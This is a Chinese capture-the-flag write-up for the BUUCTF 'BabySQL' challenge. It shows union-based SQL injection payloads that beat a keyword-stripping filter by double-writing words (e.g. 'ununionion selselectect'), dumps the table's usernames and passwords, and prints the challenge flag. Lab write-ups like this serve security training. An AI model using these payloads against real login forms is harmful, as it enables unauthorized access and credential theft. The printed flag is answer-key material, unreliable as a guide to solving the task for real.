BUU13 [极客大挑战 2019]BabySQL 1

题目中过滤了or,需要使用万能密码的变形(将or替换成 || )

登进去没什么用,我们直接在用户名中输入or,select,union,where,from等词语全被过滤了,那还玩个锤子

网上一搜需要使用双写绕过

我们输入1' || 1=1 order by 3 #,发现or和by被过滤掉了

所以需要双写 or 和 by 输入 1' || 1=1 oorrder bbyy 3 #

登陆成功,说明有三列

1' ununionion selselectect 1,2,database() #

输入1' ununionion selselectect 1,2,group_concat(table_name) frfromom information_schema.tables whwhereere table_schema='geek' #

information里头有or,也被过滤了,所以需要双写

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='geek' aandnd table_name='b4bsql'#

1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

flag{fe9beefe-0390-4b0c-8214-57bfbaa43ae7}

和Lovely SQL1一个套路,只不过需要双写绕过

相关推荐
2301_779503761 小时前
MySQL主从同步--主从复制进阶
数据库·mysql
beijingliushao1 小时前
58-正则表达式
数据库·python·mysql·正则表达式
诗句藏于尽头2 小时前
DJANGO后端服务启动报错及解决
数据库·笔记·django
手握风云-2 小时前
MySQL数据库精研之旅第十五期:索引的 “潜规则”(下)
数据库
失散133 小时前
分布式专题——1.1 Redis单机、主从、哨兵、集群部署
java·数据库·redis·分布式·架构
刘一说3 小时前
Spring Boot+Nacos+MySQL微服务问题排查指南
spring boot·mysql·微服务
2301_779503763 小时前
MySQL集群高可用架构---mysql高可用之组复制 (MGR)
数据库·mysql·架构
叁沐3 小时前
MySQL 31 误删数据后除了跑路,还能怎么办?
mysql
Hello.Reader3 小时前
一文通关 Proto3完整语法与工程实践
java·linux·数据库·proto3
c萱4 小时前
软件测试错题笔记
软件测试·数据库·笔记·测试工具·oracle·测试用例